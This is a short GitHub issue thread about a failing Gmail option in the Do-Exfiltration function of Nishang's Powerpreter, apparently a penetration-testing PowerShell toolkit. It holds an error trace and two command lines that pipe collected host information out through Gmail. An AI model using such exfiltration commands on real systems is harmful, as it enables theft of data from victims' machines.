### ISSUE TITLE
Issue with Gmail option in Do-Exfiltration function of Powerpreter

### ISSUE THREAD

**Issue by z8oon** [samratashok/nishang#20]
When using the Gmail option in the Do-Exfiltration function of Powerpreter it throws the following error:

Exception calling "Send" with "1" argument(s): "Failure sending mail."
At C:\ps\nishang\powerpreter\powerpreter.psm1:3899 char:19
+         $smtp.Send <<<< ($msg)
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

I get this error when using Do-Exfiltration with the Gmail option both with the pipeline and without it. The "Allow less secure apps" security option in gmail is checked. 

These are the lines ive used:

Get-Information | Do-Exfiltration -ExfilOption gmail -username MyUsername -Password MyPassword

Do-Exfiltration -Data Get-Information -Exfiloption gmail -Username MyUsername -Password MyPassword

Tested on two VMs and two regular boxes (x64 and x86), all with the same result.

**Comment by samratashok** [comment]
Thanks for reporting. Trying to reproduce the bug.

**Comment by samratashok** [comment]
Can 't replicate the bug. What is the PowerShell version you are using?

**Comment by samratashok** [comment]
Closing it as there has been no response from the user.
